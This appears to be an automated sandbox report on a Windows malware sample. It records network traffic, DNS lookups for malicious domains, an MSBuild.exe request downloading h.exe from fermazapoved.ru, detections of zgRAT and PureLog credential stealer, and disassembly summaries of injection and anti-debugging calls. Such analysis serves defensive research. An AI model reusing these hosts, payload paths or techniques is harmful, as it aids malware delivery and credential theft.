                        Aug 5, 2024 05:54:24.533910990 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533915043 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533921003 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533927917 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533940077 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533950090 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533955097 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533968925 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533972025 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533982038 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.533984900 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.533996105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.534024000 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.534037113 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.534054041 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536755085 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536770105 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536782980 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536794901 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536808014 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536819935 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536832094 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536844015 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536855936 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536869049 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536881924 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536894083 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536906958 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536920071 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536907911 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536932945 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536946058 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536961079 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536976099 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536988020 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537000895 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.536995888 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537015915 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537028074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537029982 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537028074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537043095 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537050009 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537055969 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537069082 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537069082 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537082911 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537086964 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537098885 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537103891 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537112951 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537121058 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537126064 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537139893 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537142992 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537152052 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537166119 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537166119 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537178040 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537179947 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537203074 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537204981 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537213087 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537219048 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537226915 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537234068 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537245989 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537246943 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537259102 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537259102 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537272930 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537281990 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537286997 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537298918 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537302017 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537316084 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537317991 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537329912 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.537333012 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537348032 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537369013 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.537383080 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538090944 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538106918 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538120031 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538131952 CEST770249705188.130.138.23192.168.2.5
                        Aug 5, 2024 05:54:24.538134098 CEST497057702192.168.2.5188.130.138.23
                        Aug 5, 2024 05:54:24.538146019 CEST497057702192.168.2.5188.130.138.23
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Aug 5, 2024 05:54:04.232667923 CEST | 58413 | 53 | 192.168.2.5 | 1.1.1.1
                        Aug 5, 2024 05:54:04.239873886 CEST | 53 | 58413 | 1.1.1.1 | 192.168.2.5
                        Aug 5, 2024 05:54:14.697774887 CEST | 56560 | 53 | 192.168.2.5 | 1.1.1.1
                        Aug 5, 2024 05:54:14.870225906 CEST | 53 | 56560 | 1.1.1.1 | 192.168.2.5
                        Aug 5, 2024 05:54:18.392652988 CEST | 53 | 59794 | 1.1.1.1 | 192.168.2.5
                        Aug 5, 2024 05:54:24.195319891 CEST | 52978 | 53 | 192.168.2.5 | 1.1.1.1
                        Aug 5, 2024 05:54:24.440479040 CEST | 53 | 52978 | 1.1.1.1 | 192.168.2.5
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Aug 5, 2024 05:54:04.232667923 CEST | 192.168.2.5 | 1.1.1.1 | 0x85 | Standard query (0) | 35.37.15.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                        Aug 5, 2024 05:54:14.697774887 CEST | 192.168.2.5 | 1.1.1.1 | 0x5d83 | Standard query (0) | fermazapoved.ru | A (IP address) | IN (0x0001) | false
                        Aug 5, 2024 05:54:24.195319891 CEST | 192.168.2.5 | 1.1.1.1 | 0xfab8 | Standard query (0) | access.samp-global.com | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Aug 5, 2024 05:54:04.239873886 CEST | 1.1.1.1 | 192.168.2.5 | 0x85 | Name error (3) | 35.37.15.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                        Aug 5, 2024 05:54:14.870225906 CEST | 1.1.1.1 | 192.168.2.5 | 0x5d83 | No error (0) | fermazapoved.ru |  | 62.173.145.78 | A (IP address) | IN (0x0001) | false
                        Aug 5, 2024 05:54:15.765044928 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f34 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                        Aug 5, 2024 05:54:15.765044928 CEST | 1.1.1.1 | 192.168.2.5 | 0x3f34 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
                        Aug 5, 2024 05:54:16.279186964 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f60 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
                        Aug 5, 2024 05:54:16.279186964 CEST | 1.1.1.1 | 192.168.2.5 | 0x1f60 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                        Aug 5, 2024 05:54:24.440479040 CEST | 1.1.1.1 | 192.168.2.5 | 0xfab8 | No error (0) | access.samp-global.com |  | 91.217.76.162 | A (IP address) | IN (0x0001) | false
                        • fermazapoved.ru
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49706 | 62.173.145.78 | 80 | 4256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Aug 5, 2024 05:54:14.881748915 CEST | 77 | OUT | GET /images/h.exe HTTP/1.1
                        Host: fermazapoved.ru
                        Connection: Keep-Alive
                        Aug 5, 2024 05:54:15.601490974 CEST | 396 | IN | HTTP/1.1 301 Moved Permanently
                        Server: nginx/1.12.0
                        Date: Mon, 05 Aug 2024 03:54:15 GMT
                        Content-Type: text/html
                        Content-Length: 185
                        Connection: keep-alive
                        Location: https://fermazapoved.ru/images/h.exe
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.0</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49708 | 62.173.145.78 | 443 | 4256 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Timestamp | Bytes transferred | Direction | Data
                        2024-08-05 03:54:16 UTC | 77 | OUT | GET /images/h.exe HTTP/1.1
                        Host: fermazapoved.ru
                        Connection: Keep-Alive
                        2024-08-05 03:54:16 UTC | 333 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.12.0
                        Date: Mon, 05 Aug 2024 03:54:16 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 811520
                        Connection: close
                        Vary: HTTPS
                        Last-Modified: Sun, 04 Aug 2024 10:23:16 GMT
                        ETag: "c6200-61ed8f2d69814"
                        Accept-Ranges: bytes
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: SAMEORIGIN



                        Target ID:0
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Users\user\Desktop\x7myVfh5YS.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\x7myVfh5YS.exe"
                        Imagebase:0xa70000
                        File size:1'403'392 bytes
                        MD5 hash:1DE4C3CC42232C1E3D7C09404F57B450
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Imagebase:0x940000
                        File size:262'432 bytes
                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"
                        Imagebase:0xd90000
                        File size:811'520 bytes
                        MD5 hash:47DA4EB71A23802DAB374E272EAD2F78
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 24%, ReversingLabs
                        • Detection: 42%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:7
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Imagebase:0xca0000
                        File size:262'432 bytes
                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false


                          Execution Graph

                          Execution Coverage:3.2%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:42%
                          Total number of Nodes:69
                          Total number of Limit Nodes:3
                          execution_graph 59363 6ceea9ae 15 API calls std::exception::exception 59295 6cee876b 59296 6cee8774 59295->59296 59303 6cee8ac8 IsProcessorFeaturePresent 59296->59303 59298 6cee8780 59304 6cee959d 10 API calls 2 library calls 59298->59304 59300 6cee8785 59301 6cee8789 59300->59301 59305 6cee95cf 7 API calls 2 library calls 59300->59305 59303->59298 59304->59300 59305->59301 59364 6ceeb5ab 43 API calls 2 library calls 59365 6cee87a4 4 API calls 2 library calls 59366 6cef0f25 60 API calls 59367 6ceea8a3 42 API calls 3 library calls 59345 6cee93e0 6 API calls 4 library calls 59368 6ceefda0 39 API calls 59346 6cef2260 15 API calls 59347 6ceec87e GetLastError SetLastError 59370 6cef033f 15 API calls ___free_lconv_mon 59374 6ceebdbb 6 API calls 59375 6cee873b 21 API calls 2 library calls 59348 6cee85f7 15 API calls ___std_type_info_destroy_list 59349 6cef05f5 18 API calls __dosmaperr 59350 6ceebf70 16 API calls 59379 6ceef7b0 19 API calls 2 library calls 59351 6cef2af0 20 API calls __startOneArgErrorHandling 59352 6ceee14f 20 API calls ___free_lconv_mon 59353 6ceed44c 17 API calls 2 library calls 59381 6cee8707 14 API calls ___scrt_release_startup_lock 59355 6ceee645 FreeLibrary 59357 6cef18df 21 API calls 59382 6ceeed9e LeaveCriticalSection 59383 6cee969c 34 API calls _unexpected 59358 6ceecddb 43 API calls 2 library calls 59359 6ceee459 6 API calls __dosmaperr 59384 6ceee696 17 API calls 59385 6ceec792 7 API calls 59306 6ced8a50 59311 6ced8a6f 59306->59311 59307 6ced8d27 59318 6cee80c0 5 API calls CatchGuardHandler 59307->59318 59309 6ced8d37 59310 6ced8c6c NtQueryInformationProcess 59310->59311 59311->59307 59311->59310 59312 6ced8d41 GetModuleHandleW 59311->59312 59314 6ced8bce GetModuleHandleW 59311->59314 59319 6ced8040 5 API calls CatchGuardHandler 59312->59319 59317 6ced8040 5 API calls CatchGuardHandler 59314->59317 59315 6ced8bfa 59315->59311 59317->59315 59318->59309 59319->59315 59320 6ced1210 59333 6ced1239 CatchIt 59320->59333 
59321 6ced6da3 GetCurrentProcess 59339 6cee8cc0 59321->59339 59324 6ced78fa 59341 6cee80c0 5 API calls CatchGuardHandler 59324->59341 59326 6ced7904 59327 6ced7141 MapViewOfFile 59327->59333 59328 6ced7f1c VirtualProtect 59342 6cee8e20 59328->59342 59330 6ced7fb0 VirtualProtect 59330->59333 59331 6ced6f58 CreateFileMappingA 59331->59333 59332 6ced75b8 VirtualProtect 59332->59333 59333->59321 59333->59324 59333->59327 59333->59328 59333->59331 59333->59332 59334 6ced7644 VirtualProtect 59333->59334 59335 6ced7e7a CreateFileMappingA 59333->59335 59336 6ced78a8 FindCloseChangeNotification CloseHandle CloseHandle 59333->59336 59337 6ced6e2c K32GetModuleInformation GetModuleFileNameA CreateFileA 59333->59337 59338 6ced7112 CloseHandle 59333->59338 59334->59333 59335->59333 59336->59333 59337->59333 59338->59333 59340 6ced6dcf GetModuleHandleA 59339->59340 59340->59333 59341->59326 59343 6cee8e38 59342->59343 59343->59330 59343->59343 59361 6cee8553 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 59386 6ced1010 5 API calls CatchGuardHandler
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2026220018.000000006CED1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CED0000, based on PE: true
                          • Associated: 00000000.00000002.2026193703.000000006CED0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026330535.000000006CEF4000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CEFB000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026353136.000000006CFCD000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026786153.000000006CFD0000.00000020.00000001.01000000.00000006.sdmp
                          • Associated: 00000000.00000002.2026832681.000000006CFDB000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6ced0000_x7myVfh5YS.jbxd
                          Similarity
                          • API ID: File$CloseHandleProtectVirtual$CreateModule$Mapping$ChangeCurrentFindInformationNameNotificationProcessView
                          • String ID: _W$_W$3q[a$3q[a$9[|$@$OaO$Yi[*$_bX$e6M1oDhFNEUDQyQ1oJj1NEuL5zRURE3b5VFs0+f0hafxBDQ3y+b0VERA8GHoBacixDQzS/8kxTRFr6+0NDuL5zRUREWlaBRES2LxHCRMDiK4cIgTSUgcBjQsBLQzSvgylw$fh{Z$iu\$}1DV
                          • API String ID: 1661531306-3674926077
                          • Opcode ID: 5617da81b6303a821e6d2af6591ce192f5f569c0967163ca0ac3f8b131601135
                          • Instruction ID: 34d6aaa19095938e17cd2afdecce8d6baf330a9373ee8f10906bed12368e642c
                          • Opcode Fuzzy Hash: 5617da81b6303a821e6d2af6591ce192f5f569c0967163ca0ac3f8b131601135
                          • Instruction Fuzzy Hash: 51C34432A51211CFEB14CE7DD9857E9B7F2AB93354F229247D418DB691C236AE4B8F00

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1117 6ced8a50-6ced8a68 1118 6ced8a6f-6ced8a7a 1117->1118 1119 6ced8b5b-6ced8bc9 1118->1119 1120 6ced8a80-6ced8a8d 1118->1120 1122 6ced8d77 1119->1122 1123 6ced8cf6-6ced8d04 1120->1123 1124 6ced8a93-6ced8aa0 1120->1124 1122->1118 1123->1122 1126 6ced8cbb-6ced8ccb 1124->1126 1127 6ced8aa6-6ced8ab3 1124->1127 1126->1122 1129 6ced8ab9-6ced8ac6 1127->1129 1130 6ced8d15-6ced8d22 1127->1130 1132 6ced8acc-6ced8ad9 1129->1132 1133 6ced8d27-6ced8d40 call 6cee80c0 1129->1133 1130->1122 1137 6ced8c4f-6ced8cb6 call 6cee8cc0 NtQueryInformationProcess 1132->1137 1138 6ced8adf-6ced8aec 1132->1138 1137->1122 1142 6ced8d09-6ced8d10 1138->1142 1143 6ced8af2-6ced8aff 1138->1143 1142->1122 1145 6ced8b05-6ced8b12 1143->1145 1146 6ced8cd0-6ced8cdf 1143->1146 1148 6ced8b18-6ced8b25 1145->1148 1149 6ced8d41-6ced8d70 GetModuleHandleW call 6ced8040 1145->1149 1146->1122 1152 6ced8bce-6ced8c3e GetModuleHandleW call 6ced8040 1148->1152 1153 6ced8b2b-6ced8b38 1148->1153 1149->1122 1152->1122 1157 6ced8b3e-6ced8b4b 1153->1157 1158 6ced8ce4-6ced8cf1 1153->1158 1161 6ced8b51-6ced8b56 1157->1161 1162 6ced8c43-6ced8c4a 1157->1162 1158->1122 1161->1122 1162->1122
                          APIs
                          Strings
                          Similarity
                          • API ID: HandleModule
                          • String ID: NtQueryInformationProcess$ntdll.dll
                          • API String ID: 4139908857-2906145389
                          • Opcode ID: 42bea393775d4a139636dbdeb81d9fbbb82b8e8d5f14bd32d2108b3ff9d5d4e3
                          • Instruction ID: 5b4ac924592b2e1bb15b89d691dd7f5c043ac48231e594be1dd39593c9e1b2b1
                          • Opcode Fuzzy Hash: 42bea393775d4a139636dbdeb81d9fbbb82b8e8d5f14bd32d2108b3ff9d5d4e3
                          • Instruction Fuzzy Hash: 9E818DB0E05208DFCB24CFACD58468DBBF4AB46344F21951BD465DBB90D735A907CB82
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6CEE8916
                          • IsDebuggerPresent.KERNEL32 ref: 6CEE89E2
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CEE89FB
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6CEE8A05
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: b45aed5a60500d20a20dc3da338e6e27f292a7f241964f8b343f6d336c2c5a3d
                          • Instruction ID: 1c56f765c19251c0ea72844c7860983c0ff227aa7eee54bad23ca54ad7bc4da4
                          • Opcode Fuzzy Hash: b45aed5a60500d20a20dc3da338e6e27f292a7f241964f8b343f6d336c2c5a3d
                          • Instruction Fuzzy Hash: 603108B5D053289BDF60DFA4D949BCDBBB8AF08344F1041AAE50DAB340EB719A84CF45
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6CEE8551,6CEF4934), ref: 6CEE8436
                          • UnhandledExceptionFilter.KERNEL32(6CEE8551,?,6CEE8551,6CEF4934), ref: 6CEE843F
                          • GetCurrentProcess.KERNEL32(C0000409,?,6CEE8551,6CEF4934), ref: 6CEE844A
                          • TerminateProcess.KERNEL32(00000000,?,6CEE8551,6CEF4934), ref: 6CEE8451
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                          • String ID:
                          • API String ID: 3231755760-0
                          • Opcode ID: 76d1766564898a21defabe37a1cb2db796e2db7da92a472e9a1dace08e5ed9dd
                          • Instruction ID: 478586dcff30e5577071ffc13f7abaacc284fe56a5c4a66d91923dee65dde554
                          • Opcode Fuzzy Hash: 76d1766564898a21defabe37a1cb2db796e2db7da92a472e9a1dace08e5ed9dd
                          • Instruction Fuzzy Hash: 46D01233204208FBCF002BE0EA0CE883F38EB8A202F014002F73E82001CB3144948B63
                          Strings
                          Similarity
                          • API ID:
                          • String ID: C-q)$sh&y
                          • API String ID: 0-3906045208
                          • Opcode ID: 013eefe44bebb0a5424c97deea289b88795355c18a4ab0885ed1de18a8f5dc3e
                          • Instruction ID: fa1f024cef2ea9cc8ae0d5d590f5d52c6b78efb49b78f949f09d5ff3725e6274
                          • Opcode Fuzzy Hash: 013eefe44bebb0a5424c97deea289b88795355c18a4ab0885ed1de18a8f5dc3e
                          • Instruction Fuzzy Hash: 0502DF31E446048FDF08CEBCD1953CE7BF2AB4B394F208416E424EBB65D62A890ACF55
                          Strings
                          • Ef8eV6zq2gWqHRcokIdCtRoHI/4NsgRuCDUhRN2UEz5hf+4ycOedQ6Ns8wTSWo2sft86pZLD525JVJryaRYVQwQ0f7iYFTMZFsRVlGyjyC1jsYBQkxouYhl9pUvM+9xUsylT1L7tyx6YJjLdiOulC97ImkujaDspbtGbCTJnjuCf77sfWFugbx95q5qGzqnpp/4lXbdeHEr6bw+Iv536CK4OgF6IoN1NDKv/6IgF9iiUJBTU2JEFd7dMiAKwwe4D3G00, xrefs: 6CED825A, 6CED88F3, 6CED8966
                          Similarity
                          • API ID:
                          • String ID: Ef8eV6zq2gWqHRcokIdCtRoHI/4NsgRuCDUhRN2UEz5hf+4ycOedQ6Ns8wTSWo2sft86pZLD525JVJryaRYVQwQ0f7iYFTMZFsRVlGyjyC1jsYBQkxouYhl9pUvM+9xUsylT1L7tyx6YJjLdiOulC97ImkujaDspbtGbCTJnjuCf77sfWFugbx95q5qGzqnpp/4lXbdeHEr6bw+Iv536CK4OgF6IoN1NDKv/6IgF9iiUJBTU2JEFd7dMiAKwwe4D3G00
                          • API String ID: 0-3414373431
                          • Opcode ID: e169539c3983451b8552cc5ca8a0ee227ed358af86a2d385f9ea446860d262ce
                          • Instruction ID: a06274ec96164aaa7b1ad594ca9d6f5ed8e6d280a2bf950752ca5cdd1f345a6f
                          • Opcode Fuzzy Hash: e169539c3983451b8552cc5ca8a0ee227ed358af86a2d385f9ea446860d262ce
                          • Instruction Fuzzy Hash: F0528976A012048FCB64CFACC8907DDBBF2EB4A354F22611AE425EB755C635A807CF45
                          APIs
                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CEF34F0,?,?,00000008,?,?,6CEF30F3,00000000), ref: 6CEF3722
                          Similarity
                          • API ID: ExceptionRaise
                          • String ID:
                          • API String ID: 3997070919-0
                          • Opcode ID: 07a5b6f02111ecdd5db957f23041c13a310bfff49040cb04653e013f3333639b
                          • Instruction ID: 505ef0990078b98103eb6bb21bbe0da5c4d5d701de4cf8eb7447dc000a412196
                          • Opcode Fuzzy Hash: 07a5b6f02111ecdd5db957f23041c13a310bfff49040cb04653e013f3333639b
                          • Instruction Fuzzy Hash: BAB126712116089FD705CF28C486B697BB0FF45368F358698E8A9CF7A1C335E992CB41
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CEE8ADE
